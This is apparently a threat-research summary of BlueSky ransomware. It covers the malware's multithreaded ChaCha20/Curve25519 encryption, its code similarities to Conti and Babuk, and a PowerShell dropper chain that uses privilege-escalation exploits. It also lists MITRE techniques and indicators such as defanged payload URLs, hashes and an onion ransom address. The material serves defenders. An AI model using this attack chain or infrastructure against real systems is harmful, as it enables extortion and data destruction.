Threat Research

BlueSky Ransomware: Fast Encryption via Multithreading

Securonix

BlueSky ransomware is an emerging Windows-focused family employing multithreading to speed up file encryption and evade defenses. The analysis ties BlueSky to Conti v3 in structure and network behavior, while its cryptography resembles Babuk (ChaCha20 with Curve25519); it also uses PowerShell for dropper delivery and notes a ransom process with Bluesky-branded notes. #BlueSkyRansomware #Conti #Babuk #RedLine #ChaCha20 #Curve25519 #PowerShell

Keypoints

  • BlueSky uses a multithreaded encryption architecture to accelerate file encoding on Windows hosts.
  • Code fingerprints show similarities to Conti v3 (notably in the network search module) and to Babuk in cryptographic approach (ChaCha20 with Curve25519).
  • The dropper chain starts with a PowerShell script (start.ps1) fetched from a remote site, decoding and loading payloads based on user privileges.
  • Privilege escalation hooks include JuicyPotato for older Windows versions and ghost/spooler.exe to exploit CVE-2020-0796 and CVE-2021-1732.
  • Final ransomware payload is downloaded as l.exe, masquerades as javaw.exe, and encrypts files with a Bluesky extension while dropping ransom notes.
  • BlueSky includes several anti-analysis techniques (string/API encryption, DJB hashing) to hinder reverse engineering.
  • Artifacts include unique IDs, registry fingerprints, and a ChaCha20-based RECOVERY BLOB used in the encryption process.

MITRE Techniques

  • [T1059.001] PowerShell – Used to drop and download payloads via start.ps1; “The initial dropper is Base64-encoded and then DEFLATE-compressed” and “start.ps1 downloaded a number of payloads from hxxps://kmsauto[.]us/someone/ based on the user’s privileges.”
  • [T1105] Ingress Tool Transfer – Final payload downloaded from hxxps://kmsauto[.]us/someone/l.exe and saved as javaw.exe.
  • [T1548.001] Exploitation for Privilege Escalation – Uses JuicyPotato for older Windows versions and ghost.exe/spooler.exe for CVE-2020-0796 and CVE-2021-1732.
  • [T1036] Masquerading – Final payload renamed to javaw.exe to masquerade as a legitimate Windows application.
  • [T1486] Data Encrypted for Impact – Multithreaded file encryption using Curve25519 and ChaCha20, replacing original data and adding .bluesky extension.
  • [T1083] File and Directory Discovery – Network search module enumerates files on local drives and mounted network shares for encryption.
  • [T1027] Obfuscated/Compressed Files and Information – Anti-analysis techniques include string encryption, API obfuscation, and DJB hashing to hinder analysis.
  • [T1112] Modify Registry – Creates HKCUSoftware entries, including RECOVERY BLOB and x25519_public, to fingerprint operations and store recovery data.

Indicators of Compromise

  • [Domain] kmsauto.us – Domain hosting BlueSky payloads and related downloader activity.
  • [URL] hxxps://kmsauto[.]us/someone/start.ps1 – Dropper location used to initiate the chain.
  • [URL] hxxps://kmsauto[.]us/someone/l.exe – Final ransomware payload download.
  • [Hash] [SHA256] BlueSky Ransomware Payloads – 2280898cb29faf1785e782596d8029cb471537ec38352e5c17cc263f1f52b8ef, 3e035f2d7d30869ce53171ef5a0f761bfb9c14d94d9fe6da385e20b8d96dc2fb
  • [Hash] [SHA256] Obfuscated PowerShell Downloader – 08f491d46a9d05f1aebc83d724ca32c8063a2613250d50ce5b7e8ba469680605
  • [Hash] [SHA256] PowerShell Downloader (decoded) – 969a4a55bb5cabc96ff003467bd8468b3079f5c95c5823985416c019eb8abe2f
  • [Hash] [SHA256] CVE-2020-0796 Privilege Escalation Exploit – c4e47cba1c5fedf9ba522bc2d2de54a482e0ac29c98358390af6dadc0a7d65ce
  • [Hash] [SHA256] JuicyPotato – cf64c08d97e6dfa5588c5fa016c25c4131ccc61b8deada7f9c8b2a41d8f5a32c
  • [Hash] [SHA256] CVE-2021-1732 Privilege Escalation Exploit – 6c94a1bc67af21cedb0bffac03019dbf870649a182e58cc5960969adf4fbdd48
  • [Hash] [SHA256] RedLine Infostealer Association – 58db85f0c86640b4c3a2584e9ef5696c526190faf87eaa19085737685bc9e7f5, 9ca0e858ff6f163a128fb699d2b801b6b13a2eb1d6cd995302effa5f587cd8d8, aecfc82fa44790e0533f0bece0a1ab0860b163838646aa0c019187a37326d477, be3e665d389e8b85ceda1e2fc80a41a247de27d1d0b13ee0c2574c1e36ebc6d4
  • [URL] Ransom Note URL – http://ccpyeuptrlatb2piua4ukhnhi7lrxgerrcrj4p2b5uhbzqm2xgdjaqid.onion
  • [File] Ransomware Extension – .bluesky (encrypted files)
  • [File] Ransom Note Filenames – # DECRYPT FILES BLUESKY #.txt, # DECRYPT FILES BLUESKY #.html
  • [Registry] HKCUSoftwarecompleted, HKCUSoftwarerecoveryblob, HKCUSoftwarex25519_public

Read more: https://unit42.paloaltonetworks.com/bluesky-ransomware/